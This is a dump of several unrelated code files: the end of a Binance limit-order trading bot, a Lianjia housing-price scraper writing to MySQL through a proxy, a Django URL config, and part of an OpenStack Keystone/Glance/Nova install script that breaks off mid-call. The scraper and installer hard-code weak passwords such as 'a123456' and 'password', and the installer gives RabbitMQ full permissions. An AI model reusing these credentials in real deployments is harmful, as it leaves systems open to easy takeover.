# orderが1つ以上ある場合は取引を実施しない\n if len(chk_order) > 0:\n print(('オープンなオーダーが存在するため、中止します'))\n return False\n\n\n #1分間のローソク足を取得する\n candles = client.get_klines(symbol=order_symbol, interval=Client.KLINE_INTERVAL_1MINUTE)\n\n Open_times = [x[0] for x in candles] #datetime.fromtimestampの際は、上から10桁を使用のこと\n Opens = [x[1] for x in candles]\n Highs = [x[2] for x in candles]\n Lows = [x[3] for x in candles]\n Closes = [x[4] for x in candles]\n Volumes = [x[5] for x in candles]\n Close_times = [x[6] for x in candles]\n\n #取引手数料を取得する\n fees = client.get_trade_fee(symbol=order_symbol)\n makercommission = fees[0]['makerCommission']\n takercommission = fees[0]['takerCommission']\n print(f'取引手数料 maker commission : {makercommission}')\n print(f'取引手数料 taker commission : {takercommission}')\n\n symbol_info = client.get_symbol_info(order_symbol)\n minprice = symbol_info['filters'][0]['minPrice'] \n maxprice = symbol_info['filters'][0]['maxPrice'] \n ticksize = symbol_info['filters'][0]['tickSize'] \n minQty = symbol_info['filters'][2]['minQty'] \n maxQty = symbol_info['filters'][2]['maxQty'] \n stepSize = symbol_info['filters'][2]['stepSize'] \n multiplierUp = symbol_info['filters'][1]['multiplierUp'] \n multiplierDown = symbol_info['filters'][1]['multiplierDown'] \n baseAssetPrecision = symbol_info['baseAssetPrecision']\n quoteAssetPrecision = symbol_info['quoteAssetPrecision']\n\n #5分間の平均価格\n avg5min = np.average([float(x) for x in Closes[-5:]])\n\n #5分間の平均価格 x multiplierUp\n maxprice_percentfilter = float(avg5min) * float(multiplierUp)\n\n #5分間の平均価格 x multiplierDown\n minprice_percentfilter = float(avg5min) * float(multiplierDown)\n\n #過去10分の最安値を取得\n min_10min = np.min([float(x) for x in Lows[-10:]])\n print(f'過去10分の最安値: {min_10min}')\n\n #過去10分の最高値を取得\n max_10min = np.max([float(x) for x in Highs[-10:]])\n print(f'過去10分の最高値: {max_10min}')\n\n min_notional = symbol_info['filters'][3]['minNotional']\n\n\n #order_priceを更新 過去10分の最高値にする\n order_price = min_10min\n order_stopprice = min_10min\n\n #order_stoppriceを更新 過去10分の最安値にする\n revorder_price = max_10min\n revorder_stopprice = max_10min\n\n\n #BUY側の処理\n #現在保有しているQuote通貨の半分を取得する\n half_quote_asset = float(client.get_asset_balance(asset=symbol_info['quoteAsset'])['free']) / 2\n\n #通過の半分に相当するorder quantityを計算する\n half_quantity = decimal.Decimal(str(half_quote_asset)) // decimal.Decimal(str(stepSize)) * decimal.Decimal(str(stepSize))\n\n #小数点以下Precision桁の文字列型にする\n order_quantity = '{:.{}f}'.format(half_quantity, quoteAssetPrecision)\n\n #SELL側の処理\n #現在保有しているBase通貨の半分を取得する\n half_base_asset = float(client.get_asset_balance(asset=symbol_info['baseAsset'])['free']) / 2\n #通過の半分に相当するorder quantityを計算する\n revhalf_quantity = decimal.Decimal(str(half_base_asset)) // decimal.Decimal(str(stepSize)) * decimal.Decimal(str(stepSize))\n #小数点以下Precision桁の文字列型にする\n revorder_quantity = '{:.{}f}'.format(revhalf_quantity, baseAssetPrecision)\n\n\n exitflg = False\n revexitflg = False\n\n #BUY側チェック\n\n #価格Filterのチェック\n if float(maxprice) < float(order_price):\n print(f'価格が最大値を超えています {maxprice}以下にしてください')\n exitflg = True\n elif float(order_price) < float(minprice):\n print(f'価格が最小値を下回っています {minprice}以上にしてください')\n exitflg = True\n\n #購入量Filterのチェック\n if float(maxQty) < float(order_quantity):\n print(f'購入量が最大値を超えています {maxQty}以下にしてください')\n exitflg = True\n elif float(minQty) > float(order_quantity):\n print(f'購入量が最小値を下回っています {minQty}以上にしてください')\n exitflg = True\n\n #PercentPriceのチェック\n if float(maxprice_percentfilter) < float(order_price):\n print(f'価格が最大値を超えています {maxprice_percentfilter}以下にしてください')\n exitflg = True\n elif float(order_price) < float(minprice_percentfilter):\n print(f'価格が最小値を下回っています {minprice_percentfilter}以上にしてください')\n exitflg = True\n\n #MIN_NOTIONALのチェック\n if float(min_notional) >= float(order_price) * float(order_quantity):\n print(f'\"price x quantityの値がMIN_NOTIONALを下回っています。\\n{min_notional}以上にしてください')\n exitflg = True\n\n #SELL側チェック\n #価格Filterのチェック\n if float(maxprice) < float(revorder_price):\n print(f'価格が最大値を超えています {maxprice}以下にしてください')\n revexitflg = True\n elif float(revorder_price) < float(minprice):\n print(f'価格が最小値を下回っています {minprice}以上にしてください')\n revexitflg = True\n\n #購入量Filterのチェック\n if float(maxQty) < float(revorder_quantity):\n print(f'購入量が最大値を超えています {maxQty}以下にしてください')\n revexitflg = True\n elif float(minQty) > float(revorder_quantity):\n print(f'購入量が最小値を下回っています {minQty}以上にしてください')\n revexitflg = True\n\n #PercentPriceのチェック\n if float(maxprice_percentfilter) < float(revorder_price):\n print(f'価格が最大値を超えています {maxprice_percentfilter}以下にしてください')\n revexitflg = True\n elif float(revorder_price) < float(minprice_percentfilter):\n print(f'価格が最小値を下回っています {minprice_percentfilter}以上にしてください')\n revexitflg = True\n\n #MIN_NOTIONALのチェック\n if float(min_notional) >= float(revorder_price) * float(revorder_quantity):\n print(f'\"price x quantityの値がMIN_NOTIONALを下回っています。\\n{min_notional}以上にしてください')\n revexitflg = True\n\n\n if exitflg:\n print('BUY注文を終了します')\n\n else:\n print('BUY注文が実行可能と判定しました')\n\n try:\n order = client.create_test_order(\n symbol=order_symbol,\n side=order_side,\n type=order_type,\n timeInForce=order_timeInForce,\n quantity=order_quantity,\n price=order_price,\n stopPrice=order_stopprice)\n \n except BinanceAPIException as e:\n print(e)\n if e.code == -1021:\n print(\"サーバーの時間の更新が必要かもしれません\")\n elif e.code == -1013:\n print(\"price x quantityの値がMIN_NOTIONALを下回っています。\\n1回の取引量の増量が必要です\")\n\n return False\n\n else:\n print(\"Test Order Success\")\n print(\"以下の内容で注文を実行します\")\n print(f\"symbol : {order_symbol}\")\n print(f\"side : {order_side}\")\n print(f\"type : {order_type}\")\n print(f\"timeInForce : {order_timeInForce}\")\n print(f\"quantity : {order_quantity}\")\n print(f\"price : {order_price}\")\n print(f\"stopPrice : {order_stopprice}\")\n\n try:\n \n order = client.create_order(\n symbol=order_symbol,\n side=order_side,\n type=order_type,\n timeInForce=order_timeInForce,\n quantity=order_quantity,\n price=order_price,\n stopPrice=order_stopprice)\n \n except BinanceAPIException as e:\n print(e)\n else:\n print('買い注文完了')\n print(client.get_open_orders(symbol=order_symbol))\n info()\n\n if revexitflg:\n print('SELL注文を終了します')\n else:\n print('SELL注文が実行可能と判定しました')\n\n try:\n order = client.create_test_order(\n symbol=order_symbol,\n side=revorder_side,\n type=revorder_type,\n timeInForce=revorder_timeInForce,\n quantity=revorder_quantity,\n price=revorder_price,\n stopPrice=revorder_stopprice)\n \n except BinanceAPIException as e:\n print(e)\n if e.code == -1021:\n print(\"サーバーの時間の更新が必要かもしれません\")\n elif e.code == -1013:\n print(\"price x quantityの値がMIN_NOTIONALを下回っています。\\n1回の取引量の増量が必要です\")\n\n\n\n else:\n print(\"Test Order Success\")\n print(\"以下の内容で注文を実行します\")\n print(f\"symbol : {order_symbol}\")\n print(f\"side : {revorder_side}\")\n print(f\"type : {revorder_type}\")\n print(f\"timeInForce : {revorder_timeInForce}\")\n print(f\"quantity : {revorder_quantity}\")\n print(f\"price : {revorder_price}\")\n print(f\"stopPrice : {revorder_stopprice}\")\n\n\n try:\n \n order = client.create_order(\n symbol=order_symbol,\n side=revorder_side,\n type=revorder_type,\n timeInForce=revorder_timeInForce,\n quantity=revorder_quantity,\n price=revorder_price,\n stopPrice=revorder_stopprice)\n \n except BinanceAPIException as e:\n print(e)\n else:\n print('売り注文完了')\n print(client.get_open_orders(symbol=order_symbol))\n info()\n\n#別スレッドで常時実行される関数です\ndef background():\n while True:\n schedule.run_pending() #schedule.every(10)minutes.do()を実行します\n sleep(1)\n\n\n# threading1 は background関数を実行し、ユーザの入力と関係なく動作し続けます\nthreading1 = threading.Thread(target=background)\nthreading1.daemon = True\nthreading1.start()\n\n\ndef task10minutes(): #10分間に1回実行するための関数として定義します\n info()\n\n\nschedule.every(10).minutes.do(task10minutes) # task10minutesを10分に1回実行します\n\n#起動時のコメント \nhelp = 'このプログラムはbinanceにアクセスし、情報取得及び指値注文を行うための学習用プログラムです\\n \\\n以下のコマンドを受け付けます\\n \\\nhelp : このヘルプを表示\\n \\\nquit : プログラムを終了する\\n \\\ninfo : 口座関係情報を出力する(10分に1回、自動的に出力されます)\\n \\\norder: 注文をする\\n'\n\n\n\ndef main():\n print(help) #helpを呼び出し、ユーザーにコマンド入力を促します\n while True:\n c = sys.stdin.readline() #ユーザーのコマンド入力を行ごとに読み込みます\n\n # print(f'読み込んだ文字{str(c)}') #デバッグ用 読み込んだ文字をprintします\n\n #以下、読み込んだ行にコマンドが含まれているか確認をし、含まれていたら関数を実行します\n if 'quit' in c:\n sys.exit()\n elif 'help' in c:\n print(help)\n elif 'info' in c:\n info()\n elif 'order' in c:\n order()\n\nif __name__ == '__main__':\n main()\n\n\n# 制約事項\n# APIエンドポイントはBinanceによって1秒あたり20リクエストでレート制限\n# 1200リクエスト/分\n# 1秒間に10件の注文\n# 24時間当たり100,000件の注文\n\n# MLによる制約\n\n\n# https://sammchardy.github.io/binance-order-filters/","repo_name":"tyamzak/binance_trade","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14911,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11395260962","text":"import requests\nimport pymysql\nimport warnings\nimport re\n\nclass HomeSpyder:\n def __init__(self):\n self.headers = {\"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36\"}\n self.baseurl = \"https://bj.lianjia.com/ershoufang/pg\"\n self.proxies = {\"http\":\"http://216.198.188.26:51068\"} #代理已過期\n self.page = 1\n self.db = pymysql.connect(\"localhost\",\"root\",\n \"a123456\",charset=\"utf8\")\n self.cursor = self.db.cursor()\n\n def readPage(self,url):\n res = requests.get(url,proxies=self.proxies,headers=self.headers,timeout=5)\n res.encoding = \"utf-8\"\n html = res.text\n print(\"頁面讀取成功,正在解析...\")\n self.parePage(html)\n\n def parePage(self,html):\n pattern = '<div class=\"positionInfo\".*?\"region\">(.*?)</a>.*?\"_blank\">(.*?)</a>.*?totalPrice.*?<span>(.*?)</span>'\n p = re.compile(pattern,re.S)\n r_list = p.findall(html)\n print(\"頁面解析完成,正在存入數據庫...\")\n self.writePage(r_list)\n \n def writePage(self,r_list):\n c_db = \"create database if not exists Lianjiadb \\\n character set utf8\"\n u_db = \"use Lianjiadb\"\n c_tab = \"create table if not exists Price(\\\n id int primary key auto_increment,\\\n houseName varchar(50),\\\n totalPrice int)charset=utf8\"\n\n warnings.filterwarnings(\"ignore\")\n try:\n self.cursor.execute(c_db)\n self.cursor.execute(u_db)\n self.cursor.execute(c_tab)\n except Warning:\n pass\n\n ins = \"insert into Price(houseName, totalPrice) values(%s,%s)\"\n for r_tuple in r_list:\n houseName = r_tuple[0].strip()+\"-\"+r_tuple[1].strip()\n totalPrice = float(r_tuple[2].strip())*10000\n L = [houseName,totalPrice]\n self.cursor.execute(ins,L)\n self.db.commit() \n print(\"寫入成功\")\n \n def workOn(self):\n while True:\n c = input(\"是否爬取(y/n):\")\n if c.strip().lower() == \"y\":\n url = self.baseurl + str(self.page) +\"/\"\n self.readPage(url)\n self.page += 1\n else:\n print(\"爬取結束\")\n self.cursor.close()\n self.db.close()\n break\n \nif __name__ == \"__main__\":\n spyder = HomeSpyder()\n spyder.workOn()\n\n\n\n\n\n","repo_name":"dian0624/Crawler","sub_path":"home_ToMysql.py","file_name":"home_ToMysql.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14228627269","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom rest_framework import routers\nfrom personal.views import PersonalViewSet\nfrom personal import views\nrouter = routers.DefaultRouter()\n\nrouter.register(r'personal', PersonalViewSet)\n#router.register(r'datos-academicos', DatosAcademicosViewSet)\nurlpatterns = [\n # Examples:\n url(r'^$', 'personal.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n url(r'^api/', include(router.urls)),\n url(r'^api/datos-academicos/$', views.DatosAcademicosCreate.as_view()),\n url(r'^api/datos-academicos/(?P<pk>[0-9]+)/$', views.DatosAcademicosDetail.as_view()),\n url(r'^api/familiar/$', views.FamiliarCreate.as_view()),\n url(r'^api/familiar-list/(?P<pk>[0-9]+)/$', views.FamiliarList.as_view()),\n url(r'^api/familiar-detail/(?P<pk>[0-9]+)/$', views.FamiliarDetail.as_view()),\n url(r'^api/cuotas/$', views.CuotasCreate.as_view()),\n url(r'^api/cuotas/(?P<pk>[0-9]+)/$', views.CuotasDetail.as_view()),\n url(r'^api/cargo/$', views.CargoCreate.as_view()),\n url(r'^api/cargo-list/(?P<pk>[0-9]+)/$', views.CargoList.as_view()),\n url(r'^api/cargo-detail/(?P<pk>[0-9]+)/$', views.CargoDetail.as_view()),\n url(r'^api/deporte/$', views.DeporteCreate.as_view()),\n url(r'^api/deporte-list/(?P<pk>[0-9]+)/$', views.DeporteList.as_view()),\n url(r'^api/deporte-detail/(?P<pk>[0-9]+)/$', views.DeporteDetail.as_view()),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n\n url(r'^api/noticias/(?P<username>\\w+)/$', views.profile_page,),\n]\n","repo_name":"HenryGBC/Apunet","sub_path":"apunet/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70552597928","text":"#!/usr/bin/env python\n\nimport os\nimport subprocess\nimport socket\nimport getpass\nimport re\nfrom typing import Tuple\nfrom termcolor import colored\n# name=\"/Users/hungnt\"\n# if os.path.isdir(name):\n# print( name +\"is a directory\")\n# subprocess.call([\"ls\",\"-l\",name])\n# else:\n# print(name + \"is not a directory\")\n\nsubnet_interface=\"0.0.0.0/24\"\nrootpasswd=\"th61\"\nhostname_controller=\"controller\"\nhostname_compute=\"compute\"\nServerName_controller=\"ServerName %s\"%hostname_controller\nmemcache_servers = 'memcache_servers = %s:11211'%hostname_controller\n\ndef checkAllVariable_func():\n print(\"\\n\")\n print(colored(\"Check all variable\",\"red\"))\n print(\"Subnet interface: \" + subnet_interface)\n print(\"root password: \" + rootpasswd)\n print(\"Host name controller: \" + hostname_controller)\n print(\"Host name computer: \" + hostname_compute)\n print(\"Server name controler: \" + ServerName_controller )\n print(\"Memcache servers: \" +memcache_servers)\n print(\"\\n\")\n\ndef checkOSInfo_func():\n print(\"\\n\")\n print(colored('Gathering system information\\n',\"red\"))\n uname =\"uname\"\n uname_arg = '-a'\n print(\"Gathering system information with %s command:\\n\" % uname)\n subprocess.call([uname, uname_arg])\n print(\"\\n\")\n\ndef checkDiskInfo_func():\n print(\"\\n\")\n print(colored('Gathering disk information\\n',\"red\"))\n DISKSPACE=\"df\"\n DISKSPACE_ARG=\"-h\"\n print(\"Gathering diskspace information with the $DISKSPACE command: \\n\\n\")\n subprocess.call([DISKSPACE,DISKSPACE_ARG])\n print(\"\\n\")\n\ndef listFile_func():\n print(\"\\n\")\n print(colored('List all file in folder source',\"red\"))\n subprocess.call(\"ls -al\",shell=True )\n print(\"\\n\")\n\ndef checkUser_func():\n # whoami=\"whoami\"\n # user_temp=subprocess.call([whoami])\n # str_user=user_temp\n # user=str(str_user)\n # import socket\n # hostname = socket.gethostname()\n # print(hostname)\n # print(user_temp)\n user=getpass.getuser()\n print(colored('Process are running which user: '+ user,\"red\"))\n if(user=='root'):\n print(colored(\"Running by root user\",\"red\"))\n else:\n print(colored(\"Must be running by root user\\nEXIT NOW\",\"red\"))\n exit()\n\ndef mariadbCheck_func():\n command=\"dpkg -l | awk '/mariadb/ {print }'|wc -l\"\n mariadb_status=subprocess.call(command, shell=True)\n # if(mariadb_status==0):\n print(\"Mariadb not ready, install it now\")\n # subprocess.call(\"dnf module -y install mariadb:10.3\", shell=True)\n subprocess.call(\"chmod +x mariadb_install.sh\", shell=True)\n subprocess.call(\"./mariadb_install.sh\", shell=True)\n # if(mariadb_status==1):\n # print(\"Mariadb are ready\")\n\ndef ntpServerCheck_func():\n command=\"dnf -y install chrony\"\n subprocess.call(command,shell=True)\n subprocess.call(\"echo allow %s >> /etc/chrony.conf\" %subnet_interface, shell=True)\n subprocess.call(\"systemctl enable --now chronyd && firewall-cmd --add-service=ntp --permanent && firewall-cmd --reload\", shell=True)\n\ndef addOpentackRepo_func():\n command=\"\"\"dnf -y install centos-release-openstack-victoria && sed -i -e \"s/enabled=1/enabled=0/g\" /etc/yum.repos.d/CentOS-OpenStack-victoria.repo && dnf --enablerepo=centos-openstack-victoria -y upgrade\"\"\"\n # subprocess.call(command, shell=True)\n flag=subprocess.call(command, shell=True)\n if(flag !=0):\n print(\"Cannot add OP repo, exit now\")\n exit()\n\n\ndef replace_line(file_name, line_num, text):\n # lines = open(file_name, 'r').readlines()\n # lines[line_num] = text\n # out = open(file_name, 'w')\n # out.writelines(lines)\n # out.close()\n with open(file_name,'r') as f:\n get_all=f.readlines()\n print(get_all)\n with open(file_name,'w') as f:\n for i,line in enumerate(get_all,1): ## STARTS THE NUMBERING FROM 1 (by default it begins with 0) \n if i == line_num: ## OVERWRITES line:line_num\n f.writelines(\"%s\\n\" %text)\n else:\n f.writelines(line)\n \ndef add_line(filename, find, insert):\n with open(filename) as in_file:\n old_contents = in_file.readlines()\n\n with open(filename, 'w') as in_file:\n for line in old_contents:\n in_file.write(line)\n if re.match(r\"%s\"%find, line):\n in_file.write('%s\\n'%insert)\n\n # def find_append_to_file():\n # \"\"\"Find and append text in a file.\"\"\"\n # with open(filename, 'r+') as file:\n # lines = file.read()\n\n # index = repr(lines).find(find) - 1\n # if index < 0:\n # raise ValueError(\"The text was not found in the file!\")\n\n # len_found = len(find) - 1\n # old_lines = lines[index + len_found:]\n\n # file.seek(index)\n # file.write(insert)\n # file.write(old_lines)\n\ndef findAndReplace_func(file_name, old, new):\n # Read in the file\n with open(file_name, 'r') as file :\n filedata = file.read()\n# Replace the target string\n filedata = filedata.replace(old, new)\n# Write the file out again\n with open(file_name, 'w') as file:\n file.write(filedata)\n\ndef getRequirements_func():\n mariadbCheck_func()\n ntpServerCheck_func()\n addOpentackRepo_func()\n subprocess.call(\"yum install epel-release -y\", shell=True)\n print(\"Install RabbitMQ, Memcached.\")\n print(\"enable powertools\")\n flag=subprocess.call(\"dnf --enablerepo=powertools -y install rabbitmq-server memcached\", shell=True)\n if(flag != 0 ):\n print(\"Install Install RabbitMQ, Memcached fail\")\n exit()\n print(\"edit mariadb conf\")\n # replace_line(\"/etc/my.cnf.d/mariadb-server.cnf\", 151,\"max_connections=500\")\n add_line(\"/etc/my.cnf.d/mariadb-server.cnf\", \"[mysqld]\",\"max_connections=500\")\n replace_line(\"/etc/sysconfig/memcached\", 5, \"\"\"OPTIONS=\"-l 0.0.0.0,::\" \"\"\")\n subprocess.call(\"systemctl restart mariadb rabbitmq-server memcached\", shell=True)\n subprocess.call(\"systemctl enable mariadb rabbitmq-server memcached\", shell=True)\n print(\"add openstack user\")\n subprocess.call(\"rabbitmqctl add_user openstack password\",shell=True)\n subprocess.call(\"\"\"rabbitmqctl set_permissions openstack \".*\" \".*\" \".*\" \"\"\",shell=True)\n print(\"If SELinux is enabled, change policy.\")\n subprocess.call(\"checkmodule -m -M -o rabbitmqctl.mod rabbitmqctl.te && semodule_package --outfile rabbitmqctl.pp --module rabbitmqctl.mod && semodule -i rabbitmqctl.pp\",shell=True)\n print(\"If Firewalld is running, allow ports for services.\")\n subprocess.call(\"firewall-cmd --add-service={mysql,memcache} --permanent && firewall-cmd --add-port=5672/tcp --permanent && firewall-cmd --reload\", shell=True)\n\n \ndef prepareDB_func():\n print(\"Prepare database....\")\n string=\"rootpasswd='%s' \"%rootpasswd\n print(string)\n replace_line(\"db_init.sh\", 4,string)\n subprocess.call(\"./db_init.sh\", shell=True)\n\ndef activeKeyston_func():\n string=\"export OS_AUTH_URL=http://%s:5000/v3\"%hostname_controller\n replace_line(\"keystonerc\",6,string)\n print(\"step1\")\n subprocess.call(\"chmod +x activeKeystone.sh\",shell=True)\n subprocess.call(\"./activeKeystone.sh\",shell=True)\n # subprocess.call(\". activeKeystone.sh\",shell=True)\n print(\"step2\")\n \n # subprocess.call(\"chmod 600 ~/keystonerc\", shell=True)\n # print(\"step3\")\n \n # subprocess.call(\"source ~/keystonerc && echo 'source ~/keystonerc ' >> ~/.bash_profile\", shell=True)\n # print(\"step4\")\n \n\ndef setupKeystone_func():\n print(\"Install Keystone\")\n flag=subprocess.call(\"dnf --enablerepo=centos-openstack-victoria,epel,powertools -y install openstack-keystone python3-openstackclient httpd mod_ssl python3-mod_wsgi python3-oauth2client\", shell=True)\n if(flag!=0):\n print(\"Install fail\")\n exit()\n replace_line(\"/etc/keystone/keystone.conf\",440,memcache_servers)\n connection=\"connection = mysql+pymysql://keystone:password@%s/keystone \"%hostname_controller\n replace_line(\"/etc/keystone/keystone.conf\",615,connection)\n string1=\"provider = fernet\"\n replace_line(\"/etc/keystone/keystone.conf\",2499,string1)\n subprocess.call(\"su -s /bin/bash keystone -c 'keystone-manage db_sync'\",shell=True)\n print('initialize keys')\n subprocess.call(\"keystone-manage fernet_setup --keystone-user keystone --keystone-group keystone\",shell=True)\n subprocess.call(\"keystone-manage credential_setup --keystone-user keystone --keystone-group keystone\",shell=True)\n command=\"keystone-manage bootstrap --bootstrap-password adminpassword --bootstrap-admin-url http://%s:5000/v3/ --bootstrap-internal-url http://%s:5000/v3/ --bootstrap-public-url http://%s:5000/v3/ --bootstrap-region-id RegionOne \"%(hostname_controller,hostname_controller,hostname_controller)\n subprocess.call(command,shell=True)\n print(\"If SELinux is enabled, change boolean settings.\")\n subprocess.call(\"setsebool -P httpd_use_openstack on && setsebool -P httpd_can_network_connect on && setsebool -P httpd_can_network_connect_db on\", shell=True)\n subprocess.call(\"checkmodule -m -M -o keystone-httpd.mod keystone-httpd.te && semodule_package --outfile keystone-httpd.pp --module keystone-httpd.mod && semodule -i keystone-httpd.pp\",shell=True)\n print(\"If Firewalld is running, allow ports for services.\")\n subprocess.call(\"firewall-cmd --add-port=5000/tcp --permanent && firewall-cmd --reload\", shell=True)\n print(\"Enable settings for Keystone and start Apache httpd.\")\n replace_line(\"/etc/httpd/conf/httpd.conf\",98,ServerName_controller)\n subprocess.call(\"ln -s /usr/share/keystone/wsgi-keystone.conf /etc/httpd/conf.d/\", shell=True)\n subprocess.call(\"systemctl enable --now httpd\", shell=True)\n # string2=\"export OS_AUTH_URL=http://%s/v3\"%hostname_controller\n # replace_line(\"keystonerc\",6,string2)\n # subprocess.call(\"cp keystonerc > /root/keystonerc\",shell=True)\n # subprocess.call(\"chmod 600 /root/keystonerc\", shell=True)\n # print(\"test\")\n # subprocess.call(\"source ~/keystonerc && echo 'source ~/keystonerc '' >> ~/.bash_profile\", shell=True)\n activeKeyston_func()\n print(\"Create OP Projects.\")\n subprocess.call(\"openstack project create --domain default --description 'Service Project' service\",shell=True)\n \ndef configureGlance_func():\n # activeKeyston_func()\n subprocess.call(\"\"\"openstack project create --domain default --description \"Service Project\" service\"\"\", shell=True)\n subprocess.call(\"openstack project list\", shell=True)\n print(\"Install and Configure OpenStack Image Service (Glance).\")\n print(\"create [glance] user in [service] project\")\n subprocess.call(\"openstack user create --domain default --project service --password servicepassword glance\",shell=True)\n print(\"add [glance] user in [admin] role\")\n subprocess.call(\"openstack role add --project service --user glance admin\", shell=True)\n print(\"create service entry for [glance]\")\n subprocess.call(\"openstack service create --name glance --description 'OpenStack Image service' image\",shell=True)\n print(\"create endpoint for [glance] (public)\")\n subprocess.call(\"openstack endpoint create --region RegionOne image public http://%s:9292\"%hostname_controller, shell=True)\n print(\"create endpoint for [glance] (internal)\")\n subprocess.call(\"openstack endpoint create --region RegionOne image internal http://%s:9292\"%hostname_controller,shell=True)\n print(\"create endpoint for [glance] (admin)\")\n subprocess.call(\"openstack endpoint create --region RegionOne image admin http://%s:9292\"%hostname_controller, shell=True)\n print(\"Install Glance.\")\n print(\"install from Victoria, EPEL, powertools\")\n subprocess.call(\"dnf --enablerepo=centos-openstack-victoria,powertools,epel -y install openstack-glance\", shell=True)\n print(\"Configure Glance.\")\n subprocess.call(\"mv /etc/glance/glance-api.conf /etc/glance/glance-api.conf.org\", shell=True)\n findAndReplace_func(\"glance-api.conf\",\"CONTROLER_HOST\",hostname_controller)\n subprocess.call(\"cp glance-api.conf /etc/glance/glance-api.conf\",shell=True)\n subprocess.call(\"chmod 640 /etc/glance/glance-api.conf && chown root:glance /etc/glance/glance-api.conf && su -s /bin/bash glance -c 'glance-manage db_sync'\", shell=True)\n subprocess.call(\"systemctl enable --now openstack-glance-api && echo 'If SELinux is enabled, change boolean settings.' && setsebool -P glance_api_can_network on\",shell=True)\n subprocess.call(\"checkmodule -m -M -o glanceapi.mod glanceapi.te && semodule_package --outfile glanceapi.pp --module glanceapi.mod && semodule -i glanceapi.pp\", shell=True)\n print(\"If Firewalld is running, allow ports for services.\")\n subprocess.call(\"firewall-cmd --add-port=9292/tcp --permanent && firewall-cmd --reload\",shell=True)\n\ndef setupKVM_func():\n print(\"Seting up KVM\")\n subprocess.call(\"dnf -y install qemu-kvm libvirt virt-install\", shell=True)\n print(\"Check module\")\n # if\n subprocess.call(\"lsmod | grep kvm\", shell=True)\n subprocess.call(\" systemctl enable --now libvirtd\", shell=True)\n\ndef configureNova_func():\n # activeKeyston_func()\n print(\"Create [nova] user in [service] project\")\n subprocess.call(\"openstack user create --domain default --project service --password servicepassword nova\", shell=True)\n print(\"Add [nova] user in [admin] role\")\n subprocess.call(\"openstack role add --project service --user nova admin\", shell=True)\n print(\"Create [placement] user in [service] project\")\n subprocess.call(\"openstack user create --domain default --project service --password servicepassword placement\", shell=True)\n print(\"add [placement] user in [admin] role\")\n subprocess.call(\"openstack role add --project service --user placement admin\", shell=True)\n print(\"Create service entry for [nova]\")\n subprocess.call(\"openstack service create --name nova --description 'OpenStack Compute service' compute\",shell=True)\n print(\"Create service entry for [placement]\")\n subprocess.call(\"openstack service create --name placement --description 'OpenStack Compute Placement service' placement\", shell=True)\n # print(\"Define Nova API Host\")\n # subprocess.call(\"\", shell=True)\n print(\"create endpoint for [nova] (public)\")\n subprocess.call(\"openstack endpoint create --region RegionOne compute public http://controller:8774/v2.1/%\\(tenant_id\\)s\", shell=True)\n print(\"create endpoint for [nova] (internal)\")\n subprocess.call(\"openstack endpoint create --region RegionOne compute internal http://controller:8774/v2.1/%\\(tenant_id\\)s\", shell=True)\n print(\"create endpoint for [nova] (admin)\")\n subprocess.call(\"openstack endpoint create --region RegionOne compute admin http://controller:8774/v2.1/%\\(tenant_id\\)s\", shell=True)\n print(\"create endpoint for [placement] (public)\")\n subprocess.call(\" openstack endpoint create --region RegionOne placement public http://controller:8778\", shell=True)\n print(\"create endpoint for [placement] (internal)\")\n subprocess.call(\"openstack endpoint create --region RegionOne placement internal http://controller:8778\", shell=True)\n print(\"create endpoint for [placement] (admin)\")\n subprocess.call(\"openstack endpoint create --region RegionOne placement admin http://controller:8778\", shell=True)\n print(\"Install Nova services.\")\n subprocess.call(\"dnf --enablerepo=centos-openstack-victoria,powertools,epel -y install openstack-nova openstack-placement-api\",shell=True)\n print(\"Configure Nova.\")\n subprocess.call(\"mv /etc/nova/nova.conf /etc/nova/nova.conf.org\",shell=True)\n subprocess.call(\"cat nova.conf > /etc/nova/nova.conf && chmod 640 /etc/nova/nova.conf && chgrp nova /etc/nova/nova.conf\", shell=True)\n subprocess.call(\"mv /etc/placement/placement.conf /etc/placement/placement.conf.org\",shell=True)\n subprocess.call(\"cat placement.conf > /etc/placement/placement.conf\",shell=True)\n subprocess.call(\"chmod 640 /etc/placement/placement.conf && chgrp placement /etc/placement/placement.conf\",shell=True)\n add_line(\"/etc/httpd/conf.d/00-placement-api.conf\",15,\"\"\"<Directory /usr/bin> \\n Require all granted \\n </Directory>\\n \"\"\")\n print(\"If SELinux is enabled, change policy.\")\n subprocess.call(\"dnf --enablerepo=centos-openstack-victoria -y install openstack-selinux\", shell=True)\n subprocess.call(\"semanage port -a -t http_port_t -p tcp 8778\", shell=True)\n subprocess.call(\"checkmodule -m -M -o novaapi.mod novaapi.te\", shell=True)\n subprocess.call(\"semodule_package --outfile novaapi.pp --module novaapi.mod\", shell=True)\n subprocess.call(\"semodule -i novaapi.pp\", shell=True)\n subprocess.call(\"firewall-cmd --add-port={6080/tcp,6081/tcp,6082/tcp,8774/tcp,8775/tcp,8778/tcp} --permanent\", shell=True)\n subprocess.call(\"firewall-cmd --reload\", shell=True)\n print(\"\"\" \tAdd Data into Database and start Nova services. \\nIt doesn't need to care the messages \"deprecated ***\" when sync DB. \"\"\")\n subprocess.call(\"su -s /bin/bash placement -c 'placement-manage db sync'\", shell=True)\n subprocess.call(\"\"\" su -s /bin/bash nova -c \"nova-manage api_db sync\" \"\"\", shell=True)\n subprocess.call(\"\"\" su -s /bin/bash nova -c \"nova-manage cell_v2 map_cell0\" \"\"\", shell=True)\n subprocess.call(\"\"\" su -s /bin/bash nova -c \"nova-manage db sync\" \"\"\", shell=True)\n subprocess.call(\"\"\" su -s /bin/bash nova -c \"nova-manage cell_v2 create_cell --name cell1\" \"\"\", shell=True)\n subprocess.call(\"\"\" systemctl restart httpd \"\"\", shell=True)\n subprocess.call(\"\"\" chown placement. /var/log/placement/placement-api.log \"\"\", 